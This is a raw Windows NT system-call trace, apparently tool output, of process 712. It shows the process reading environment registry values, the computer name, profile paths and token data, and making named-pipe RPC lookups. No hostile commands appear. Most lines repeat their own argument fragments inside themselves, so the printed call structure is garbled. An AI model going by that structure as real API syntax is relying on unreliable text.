 04407   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04408   712   NtEnumerateValueKey  (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) , Data= (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) }, 58, ) == 0x0
 04409   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04410   712   NtEnumerateValueKey  (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) , Data= (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) }, 154, ) == 0x0
 04411   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04412   712   NtEnumerateValueKey  (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) , Data= (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) }, 66, ) == 0x0
 04413   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04414   712   NtEnumerateValueKey  (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) , Data= (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) }, 64, ) == 0x0
 04415   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04416   712   NtEnumerateValueKey  (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) , Data= (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) }, 134, ) == 0x0
 04417   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04418   712   NtEnumerateValueKey  (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04419   712   NtEnumerateValueKey  (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04420   712   NtEnumerateValueKey  (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) , Data= (644, 0, Full, 220, ... TitleIdx=0, Type=2, Name="ComSpec", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0c\0m\0d\0.\0e\0x\0e\0\0\0"}, 96, ) }, 96, ) == 0x0
 04421   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04422   712   NtEnumerateValueKey  (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) , Data= (644, 1, Full, 220, ... TitleIdx=0, Type=2, Name="Path", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0;\0%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0W\0b\0e\0m\0\0\0"}, 152, ) }, 152, ) == 0x0
 04423   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04424   712   NtEnumerateValueKey  (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) , Data= (644, 2, Full, 220, ... TitleIdx=0, Type=2, Name="windir", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\0\0"}, 58, ) }, 58, ) == 0x0
 04425   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04426   712   NtEnumerateValueKey  (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) , Data= (644, 3, Full, 220, ... TitleIdx=0, Type=1, Name="OS", Data="W\0i\0n\0d\0o\0w\0s\0_\0N\0T\0\0\0"}, 46, ) }, 46, ) == 0x0
 04427   712   NtEnumerateValueKey  (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) , Data= (644, 4, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_ARCHITECTURE", Data="x\08\06\0\0\0"}, 72, ) }, 72, ) == 0x0
 04428   712   NtEnumerateValueKey  (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) , Data= (644, 5, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_LEVEL", Data="1\05\0\0\0"}, 58, ) }, 58, ) == 0x0
 04429   712   NtEnumerateValueKey  (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) , Data= (644, 6, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_IDENTIFIER", Data="x\08\06\0 \0F\0a\0m\0i\0l\0y\0 \01\05\0 \0M\0o\0d\0e\0l\0 \04\0 \0S\0t\0e\0p\0p\0i\0n\0g\0 \08\0,\0 \0G\0e\0n\0u\0i\0n\0e\0I\0n\0t\0e\0l\0\0\0"}, 154, ) }, 154, ) == 0x0
 04430   712   NtEnumerateValueKey  (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) , Data= (644, 7, Full, 220, ... TitleIdx=0, Type=1, Name="PROCESSOR_REVISION", Data="0\04\00\08\0\0\0"}, 66, ) }, 66, ) == 0x0
 04431   712   NtEnumerateValueKey  (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) , Data= (644, 8, Full, 220, ... TitleIdx=0, Type=1, Name="NUMBER_OF_PROCESSORS", Data="1\0\0\0"}, 64, ) }, 64, ) == 0x0
 04432   712   NtEnumerateValueKey  (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name= (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) , Data= (644, 9, Full, 220, ... TitleIdx=0, Type=1, Name="PATHEXT", Data=".\0C\0O\0M\0;\0.\0E\0X\0E\0;\0.\0B\0A\0T\0;\0.\0C\0M\0D\0;\0.\0V\0B\0S\0;\0.\0V\0B\0E\0;\0.\0J\0S\0;\0.\0J\0S\0E\0;\0.\0W\0S\0F\0;\0.\0W\0S\0H\0\0\0"}, 134, ) }, 134, ) == 0x0
 04433   712   NtEnumerateValueKey  (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (644, 10, Full, 220, ... TitleIdx=0, Type=2, Name="TEMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04434   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04435   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04436   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\TEMP"}, 24702336, ... ) }, 24702336, ... ) == 0x0
 04437   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04438   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04439   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04440   712   NtEnumerateValueKey  (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name= (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) , Data= (644, 11, Full, 220, ... TitleIdx=0, Type=2, Name="TMP", Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0T\0E\0M\0P\0\0\0"}, 64, ) }, 64, ) == 0x0
 04441   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04442   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04443   712   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\TEMP"}, 24702336, ... ) }, 24702336, ... ) == 0x0
 04444   712   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 04445   712   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 04446   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04447   712   NtClose  (644, ... ) == 0x0
 04448   712   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\ComputerName"}, ... 644, ) }, ... 644, ) == 0x0
 04449   712   NtOpenKey  (0x20019, {24, 644, 0x40, 0, 0,  (0x20019, {24, 644, 0x40, 0, 0, "ActiveComputerName"}, ... 664, ) }, ... 664, ) == 0x0
 04450   712   NtQueryValueKey  (664,  (664, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Full, 108, ... TitleIdx=0, Type=1, Name= (664, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) , Data= (664, "ComputerName", Full, 108, ... TitleIdx=0, Type=1, Name="ComputerName", Data="M\0Y\0W\0O\0R\0L\0D\0\0\0"}, 60, ) }, 60, ) == 0x0
 04451   712   NtClose  (664, ... ) == 0x0
 04452   712   NtClose  (644, ... ) == 0x0
 04453   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04454   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 644, ) }, ... 644, ) == 0x0
 04455   712   NtQueryValueKey  (644,  (644, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) , Partial, 144, ... TitleIdx=0, Type=2, Data= (644, "ProfilesDirectory", Partial, 144, ... TitleIdx=0, Type=2, Data="%\0S\0y\0s\0t\0e\0m\0D\0r\0i\0v\0e\0%\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\0\0"}, 86, ) }, 86, ) == 0x0
 04456   712   NtClose  (644, ... ) == 0x0
 04457   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows NT\CurrentVersion\ProfileList"}, ... 644, ) }, ... 644, ) == 0x0
 04458   712   NtQueryValueKey  (644,  (644, "DefaultUserProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="D\0e\0f\0a\0u\0l\0t\0 \0U\0s\0e\0r\0\0\0"}, 38, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (644, "DefaultUserProfile", Partial, 144, ... TitleIdx=0, Type=1, Data="D\0e\0f\0a\0u\0l\0t\0 \0U\0s\0e\0r\0\0\0"}, 38, ) }, 38, ) == 0x0
 04459   712   NtClose  (644, ... ) == 0x0
 04460   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04461   712   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion"}, ... 644, ) }, ... 644, ) == 0x0
 04462   712   NtQueryValueKey  (644,  (644, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (644, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 04463   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04464   712   NtQueryValueKey  (644,  (644, "CommonFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\0\0"}, 72, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (644, "CommonFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\\0C\0o\0m\0m\0o\0n\0 \0F\0i\0l\0e\0s\0\0\0"}, 72, ) }, 72, ) == 0x0
 04465   712   NtQueryVirtualMemory  (-1, 0x17a0000, Basic, 28, ... {BaseAddress=0x17a0000,AllocationBase=0x17a0000,AllocationProtect=0x4,RegionSize=0x1000,State=0x1000,Protect=0x4,Type=0x20000,}, 0x0, ) == 0x0
 04466   712   NtClose  (644, ... ) == 0x0
 04467   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04468   712   NtOpenKey  (0x20019, {24, 124, 0x40, 0, 0,  (0x20019, {24, 124, 0x40, 0, 0, "S-1-5-21-1078081533-484763869-839522115-1003"}, ... 644, ) }, ... 644, ) == 0x0
 04469   712   NtOpenThreadToken  (-2, 0x2000c, 1, ... ) == STATUS_NO_TOKEN
 04470   712   NtQueryInformationToken  (640, Type, 4, ... {token info, class 8, size 4}, 4, ) == 0x0
 04471   712   NtDuplicateToken  (640, 0xc, {24, 0, 0x0, 0, 24703720, 0x0}, 0, 2, ... ) == STATUS_ACCESS_DENIED
 04472   712   NtQueryInformationToken  (640, User, 200, ... {token info, class 1, size 36}, 36, ) == 0x0
 04473   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04474   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\10\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\230\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=104}, "\5\0\2\3\20\0\0\0h\0\0\0\7\0\0\0P\0\0\0\1\0\0\08\330\26\0\1\0\0\0\0\0\0\0\0\0\0\0\\330\26\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\12\0\0\0\0\0\0\0\12\0\0\0W\0O\0R\0K\0G\0R\0O\0U\0P\0\0\0\0\0\0\0", ) , 64, 1024, ... {status=0x103, info=104},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\10\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\230\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=104}, "\5\0\2\3\20\0\0\0h\0\0\0\7\0\0\0P\0\0\0\1\0\0\08\330\26\0\1\0\0\0\0\0\0\0\0\0\0\0\\330\26\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\12\0\0\0\0\0\0\0\12\0\0\0W\0O\0R\0K\0G\0R\0O\0U\0P\0\0\0\0\0\0\0", ) , ) == 0x103
 04475   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\11\0\0\0\\0\0\0\0\09\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\320\362x\1\1\0\0\0\330\264\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\10\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 116, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\11\0\0\0\\0\0\0\0\09\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\320\362x\1\1\0\0\0\330\264\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\10\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
 04476   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\12\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\11\0\0\0\234\0\0\0\0\0\0\0`\243\27\0\1\0\0\0l\243\27\0 \0\0\0\1\0\0\0\16\0\20\0x\243\27\0\210\243\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0O\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , 44, 1024, ... {status=0x103, info=180},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0,\0\0\0\12\0\0\0\24\0\0\0\0\0\0\0\0\0\0\0Y\304/K\351?\334\21\261\310\0\14)\371\246\305", 44, 1024, ... {status=0x103, info=180}, "\5\0\2\3\20\0\0\0\264\0\0\0\11\0\0\0\234\0\0\0\0\0\0\0`\243\27\0\1\0\0\0l\243\27\0 \0\0\0\1\0\0\0\16\0\20\0x\243\27\0\210\243\27\0\10\0\0\0\0\0\0\0\7\0\0\0M\0Y\0W\0O\0R\0L\0D\0O\0\4\0\0\0\1\4\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\1\0\0\0P\272\27\0\1\0\0\0\1\0\0\0\20\0\22\0d\272\27\0\0\0\0\0\0\0\0\0\11\0\0\0\0\0\0\0\10\0\0\0S\0R\0I\0-\0u\0s\0e\0r\0\1\0\0\0\0\0\0\0", ) , ) == 0x103
 04477   712   NtOpenThreadToken  (-2, 0xc, 1, ... ) == STATUS_NO_TOKEN
 04478   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\13\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\12\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 64, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0@\0\0\0\13\0\0\0(\0\0\0\0\0,\0\0\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\224\362x\1\14\0\0\0\2\0\1\0\0\10\0\0", 64, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\12\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x103
 04479   712   NtFsControlFile  (660, 609, 0x0, 0x0, 0x11c017,  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\14\0\0\0\\0\0\0\0\09\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\314\362x\1\1\0\0\0\330\264\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\13\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , 116, 1024, ... {status=0x103, info=48},  (660, 609, 0x0, 0x0, 0x11c017, "\5\0\0\3\20\0\0\0t\0\0\0\14\0\0\0\\0\0\0\0\09\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305\1\0\0\0\314\362x\1\1\0\0\0\330\264\27\0\5\0\0\0\1\5\0\0\0\0\0\5\25\0\0\0\3757B@\335\350\344\34C\27\122\353\3\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0", 116, 1024, ... {status=0x103, info=48}, "\5\0\2\3\20\0\0\00\0\0\0\13\0\0\0\30\0\0\0\0\0\0\0\0\0\0\0Z\304/K\351?\334\21\261\310\0\14)\371\246\305\0\0\0\0", ) , ) == 0x103
